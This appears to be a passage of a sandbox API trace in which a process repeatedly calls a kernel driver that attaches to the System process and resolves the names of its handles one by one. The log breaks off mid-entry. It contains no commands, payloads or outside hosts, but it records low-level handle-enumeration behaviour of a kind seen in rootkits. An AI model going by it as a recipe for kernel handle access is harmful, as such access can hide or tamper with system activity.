RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.752] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.753] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.753] PsAcquireProcessExitSynchronization () returned 0x0 [0118.753] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.753] ObReferenceObjectByHandle (in: Handle=0xffffffff80000568, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800379af20, HandleInformation=0x0) returned 0x0 [0118.753] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.753] PsReleaseProcessExitSynchronization () returned 0x2 [0118.753] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.753] ObQueryNameString (in: Object=0xfffffa800379af20, ObjectNameInfo=0xfffffa8002891044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002891044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.753] ObfDereferenceObject (Object=0xfffffa800379af20) returned 0x2 [0118.753] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.753] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.753] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.753] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.753] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.753] PsAcquireProcessExitSynchronization () returned 0x0 [0118.753] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.753] ObReferenceObjectByHandle (in: Handle=0xffffffff8000056c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ecfa90, HandleInformation=0x0) returned 0x0 [0118.754] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.754] PsReleaseProcessExitSynchronization () returned 0x2 [0118.754] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.754] ObQueryNameString (in: Object=0xfffffa8001ecfa90, ObjectNameInfo=0xfffffa8002892044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002892044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.754] ObfDereferenceObject (Object=0xfffffa8001ecfa90) returned 0x2 [0118.754] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.754] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.754] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.754] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.754] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.754] PsAcquireProcessExitSynchronization () returned 0x0 [0118.754] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.754] ObReferenceObjectByHandle (in: Handle=0xffffffff800005b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800bb87f20, HandleInformation=0x0) returned 0x0 [0118.754] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.754] PsReleaseProcessExitSynchronization () returned 0x2 [0118.754] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.754] ObQueryNameString (in: Object=0xfffffa800bb87f20, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.755] ObfDereferenceObject (Object=0xfffffa800bb87f20) returned 0x2 [0118.755] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.755] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.755] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.755] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.755] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.755] PsAcquireProcessExitSynchronization () returned 0x0 [0118.755] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.755] ObReferenceObjectByHandle (in: Handle=0xffffffff800005c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed4400, HandleInformation=0x0) returned 0x0 [0118.755] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.755] PsReleaseProcessExitSynchronization () returned 0x2 [0118.755] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.755] ObQueryNameString (in: Object=0xfffffa8001ed4400, ObjectNameInfo=0xfffffa8002894044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002894044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.755] ObfDereferenceObject (Object=0xfffffa8001ed4400) returned 0x2 [0118.755] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.755] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.755] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.755] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xce, lpOverlapped=0x0) returned 1 [0118.757] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.757] PsAcquireProcessExitSynchronization () returned 0x0 [0118.757] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.757] ObReferenceObjectByHandle (in: Handle=0xffffffff800005d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002152340, HandleInformation=0x0) returned 0x0 [0118.757] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.757] PsReleaseProcessExitSynchronization () returned 0x2 [0118.757] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.757] ObQueryNameString (in: Object=0xfffffa8002152340, ObjectNameInfo=0xfffffa8002895044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002895044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.757] ObfDereferenceObject (Object=0xfffffa8002152340) returned 0x2 [0118.757] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.757] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.758] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.758] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.758] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.758] PsAcquireProcessExitSynchronization () returned 0x0 [0118.758] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.758] ObReferenceObjectByHandle (in: Handle=0xffffffff800005f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f86550, HandleInformation=0x0) returned 0x0 [0118.758] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.758] PsReleaseProcessExitSynchronization () returned 0x2 [0118.758] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.758] ObQueryNameString (in: Object=0xfffffa8001f86550, ObjectNameInfo=0xfffffa8002896044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002896044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.758] ObfDereferenceObject (Object=0xfffffa8001f86550) returned 0x2 [0118.758] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.758] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.758] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.759] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.759] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.759] PsAcquireProcessExitSynchronization () returned 0x0 [0118.759] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.759] ObReferenceObjectByHandle (in: Handle=0xffffffff800005fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a75f20, HandleInformation=0x0) returned 0x0 [0118.759] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.759] PsReleaseProcessExitSynchronization () returned 0x2 [0118.759] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.759] ObQueryNameString (in: Object=0xfffffa8003a75f20, ObjectNameInfo=0xfffffa8002897044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002897044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.759] ObfDereferenceObject (Object=0xfffffa8003a75f20) returned 0x2 [0118.759] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.759] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.759] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.759] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.759] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.759] PsAcquireProcessExitSynchronization () returned 0x0 [0118.759] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.759] ObReferenceObjectByHandle (in: Handle=0xffffffff80000600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f95980, HandleInformation=0x0) returned 0x0 [0118.759] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.760] PsReleaseProcessExitSynchronization () returned 0x2 [0118.760] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.760] ObQueryNameString (in: Object=0xfffffa8001f95980, ObjectNameInfo=0xfffffa8002898044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002898044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.760] ObfDereferenceObject (Object=0xfffffa8001f95980) returned 0x2 [0118.760] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.760] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.760] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.760] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.760] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.760] PsAcquireProcessExitSynchronization () returned 0x0 [0118.760] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.760] ObReferenceObjectByHandle (in: Handle=0xffffffff80000604, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed6200, HandleInformation=0x0) returned 0x0 [0118.760] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.760] PsReleaseProcessExitSynchronization () returned 0x2 [0118.760] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.760] ObQueryNameString (in: Object=0xfffffa8001ed6200, ObjectNameInfo=0xfffffa8002899044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002899044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.760] ObfDereferenceObject (Object=0xfffffa8001ed6200) returned 0x2 [0118.761] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.761] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.761] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.762] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.762] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.762] PsAcquireProcessExitSynchronization () returned 0x0 [0118.762] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.762] ObReferenceObjectByHandle (in: Handle=0xffffffff80000608, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f932f0, HandleInformation=0x0) returned 0x0 [0118.762] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.762] PsReleaseProcessExitSynchronization () returned 0x2 [0118.762] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.762] ObQueryNameString (in: Object=0xfffffa8001f932f0, ObjectNameInfo=0xfffffa800289a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.762] ObfDereferenceObject (Object=0xfffffa8001f932f0) returned 0x2 [0118.762] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.763] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.763] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.763] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.763] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.763] PsAcquireProcessExitSynchronization () returned 0x0 [0118.763] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.763] ObReferenceObjectByHandle (in: Handle=0xffffffff80000610, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f948b0, HandleInformation=0x0) returned 0x0 [0118.776] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.828] PsReleaseProcessExitSynchronization () returned 0x2 [0118.828] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.828] ObQueryNameString (in: Object=0xfffffa8001f948b0, ObjectNameInfo=0xfffffa800289b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.828] ObfDereferenceObject (Object=0xfffffa8001f948b0) returned 0x2 [0118.828] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.829] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.829] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.829] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.829] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.829] PsAcquireProcessExitSynchronization () returned 0x0 [0118.829] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.837] ObReferenceObjectByHandle (in: Handle=0xffffffff80000614, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed6890, HandleInformation=0x0) returned 0x0 [0118.837] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.837] PsReleaseProcessExitSynchronization () returned 0x2 [0118.838] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.838] ObQueryNameString (in: Object=0xfffffa8001ed6890, ObjectNameInfo=0xfffffa800289d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289d044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.838] ObfDereferenceObject (Object=0xfffffa8001ed6890) returned 0x2 [0118.838] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.838] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.838] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.838] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.838] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.838] PsAcquireProcessExitSynchronization () returned 0x0 [0118.838] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.838] ObReferenceObjectByHandle (in: Handle=0xffffffff80000618, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f93d20, HandleInformation=0x0) returned 0x0 [0118.838] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.838] PsReleaseProcessExitSynchronization () returned 0x2 [0118.838] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.838] ObQueryNameString (in: Object=0xfffffa8001f93d20, ObjectNameInfo=0xfffffa80028a8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028a8044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.838] ObfDereferenceObject (Object=0xfffffa8001f93d20) returned 0x2 [0118.838] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.838] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.839] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.839] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.839] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.839] PsAcquireProcessExitSynchronization () returned 0x0 [0118.839] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.839] ObReferenceObjectByHandle (in: Handle=0xffffffff8000061c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039179a0, HandleInformation=0x0) returned 0x0 [0118.839] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.839] PsReleaseProcessExitSynchronization () returned 0x2 [0118.839] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.839] ObQueryNameString (in: Object=0xfffffa80039179a0, ObjectNameInfo=0xfffffa80028ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.839] ObfDereferenceObject (Object=0xfffffa80039179a0) returned 0x2 [0118.839] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.839] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.839] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.839] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.839] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.839] PsAcquireProcessExitSynchronization () returned 0x0 [0118.839] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.839] ObReferenceObjectByHandle (in: Handle=0xffffffff80000620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f93780, HandleInformation=0x0) returned 0x0 [0118.839] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.839] PsReleaseProcessExitSynchronization () returned 0x2 [0118.839] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.839] ObQueryNameString (in: Object=0xfffffa8001f93780, ObjectNameInfo=0xfffffa8002890044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002890044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.840] ObfDereferenceObject (Object=0xfffffa8001f93780) returned 0x2 [0118.840] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.840] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.840] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.840] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.840] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.840] PsAcquireProcessExitSynchronization () returned 0x0 [0118.840] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.840] ObReferenceObjectByHandle (in: Handle=0xffffffff80000624, DesiredAccess=0x0, 